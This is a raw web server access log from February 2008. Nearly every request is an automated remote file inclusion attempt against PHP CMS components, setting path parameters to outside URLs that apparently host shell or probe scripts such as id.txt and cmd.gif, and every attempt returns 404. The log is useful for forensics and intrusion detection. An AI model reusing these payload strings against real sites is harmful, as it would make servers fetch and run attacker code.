208.77.102.172 - - [17/Feb/2008:19:21:00 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:21:04 -0800] "GET /logs/access_080114.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:21:04 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:21:04 -0800] "GET /logs/access_080114.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:21:04 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:21:04 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:21:05 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [17/Feb/2008:19:21:06 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.56.111.194 - - [17/Feb/2008:19:21:07 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
69.64.76.29 - - [17/Feb/2008:19:22:15 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:22:20 -0800] "GET /logs/access_070917.log/moduleshttp://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:22:21 -0800] "GET /moduleshttp://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:22:21 -0800] "GET /logs/moduleshttp://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.239.10.63 - - [17/Feb/2008:19:24:12 -0800] "GET /logs/access_070917.log//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.239.10.63 - - [17/Feb/2008:19:24:12 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.myadultsshop.com/media/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:25:09 -0800] "GET /logs/access_080114.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:25:10 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:25:10 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:25:11 -0800] "GET /logs/access_070917.log/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:25:12 -0800] "GET /modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.60.94.230 - - [17/Feb/2008:19:25:13 -0800] "GET /logs/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://boyz.madoo.com/cmd.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.105.239.8 - - [17/Feb/2008:19:25:54 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
74.6.26.24 - - [17/Feb/2008:19:28:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.100 - - [17/Feb/2008:19:28:27 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.230.11.181 - - [17/Feb/2008:19:29:10 -0800] "GET /logs/access_070917.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.230.11.181 - - [17/Feb/2008:19:29:12 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:29:59 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:19:30:02 -0800] "GET /logs/access_080114.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:19:30:02 -0800] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:19:30:02 -0800] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:33:06 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:34:26 -0800] "GET /logs/access_070917.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:34:26 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.85.52.146 - - [17/Feb/2008:19:34:26 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
58.69.27.186 - - [17/Feb/2008:19:36:42 -0800] "GET / HTTP/1.1" 200 1048 "http://www.globalfundforwomen.org/cms/content/view/33/134/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:36:55 -0800] "GET /logs/access_070917.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:36:55 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.9.159.213 - - [17/Feb/2008:19:36:55 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.40.23.83 - - [17/Feb/2008:19:37:33 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../.../id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.101.197.130 - - [17/Feb/2008:19:37:46 -0800] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.64.76.29 - - [17/Feb/2008:19:39:09 -0800] "GET /logs/access_070917.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.64.76.29 - - [17/Feb/2008:19:39:09 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:40:19 -0800] "GET /logs/access_070917.log/includes/login.php?_SESSION[docroot_path]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:40:19 -0800] "GET /includes/login.php?_SESSION[docroot_path]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
208.77.102.172 - - [17/Feb/2008:19:40:19 -0800] "GET /logs/includes/login.php?_SESSION[docroot_path]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.184.165.34 - - [17/Feb/2008:19:40:32 -0800] "GET /logs/access_070917.log/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.184.165.34 - - [17/Feb/2008:19:40:32 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.160.16.3 - - [17/Feb/2008:19:40:46 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
82.160.16.3 - - [17/Feb/2008:19:40:47 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
123.214.171.162 - - [17/Feb/2008:19:42:57 -0800] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:43:31 -0800] "GET /logs/access_080114.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:43:32 -0800] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:43:32 -0800] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:19:43:43 -0800] "GET /view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:19:44:44 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:19:44:44 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:19:44:44 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
85.12.50.119 - - [17/Feb/2008:19:44:44 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:22 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:22 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:23 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.galf.org"
69.72.144.18 - - [17/Feb/2008:19:45:23 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:19:47:54 -0800] "GET /view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
153.19.101.68 - - [17/Feb/2008:19:47:55 -0800] "GET /view.php?table=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:48:47 -0800] "GET /logs/access_080114.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:48:47 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:48:47 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.149.238.27 - - [17/Feb/2008:19:49:07 -0800] "GET /view.php?table=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.28.105 - - [17/Feb/2008:19:49:29 -0800] "GET /logs/?N=D HTTP/1.0" 200 6187 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
70.86.236.106 - - [17/Feb/2008:19:50:07 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
87.25.213.172 - - [17/Feb/2008:19:50:16 -0800] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:19:52:32 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.185.237.140 - - [17/Feb/2008:19:52:32 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:52:35 -0800] "GET /logs/access_070917.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:52:36 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
123.214.171.162 - - [17/Feb/2008:19:52:36 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.adng.freecoolsite.com/modules/Forums/templates/adng/images/lang_english/.../.../.../yes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.100.220.42 - - [17/Feb/2008:19:53:00 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.nuovosportivissimo.it/cutenews/data/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:19:54:00 -0800] "GET /logs/access_080114.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:19:54:01 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:54:28 -0800] "GET /logs/access_070917.log/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:54:28 -0800] "GET /convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:19:54:28 -0800] "GET /logs/convert/mvcw.php?vwar_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:19:55:26 -0800] "GET /logs/access_080114.log/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:19:55:28 -0800] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
83.16.96.219 - - [17/Feb/2008:19:55:29 -0800] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:55:48 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.255.3.76 - - [17/Feb/2008:19:55:48 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.255.3.76 - - [17/Feb/2008:19:55:49 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
216.17.102.134 - - [17/Feb/2008:19:55:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:19:55:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/main.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:19:55:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:19:55:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.mecad.es/bo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:19:55:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
216.17.102.134 - - [17/Feb/2008:19:56:00 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.freewebtown.com/caliasa/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
89.255.3.76 - - [17/Feb/2008:19:57:02 -0800] "GET /logs/access.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.255.3.76 - - [17/Feb/2008:19:57:02 -0800] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
89.255.3.76 - - [17/Feb/2008:19:57:03 -0800] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://kampeermarkt.com/.../id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "galf.org"
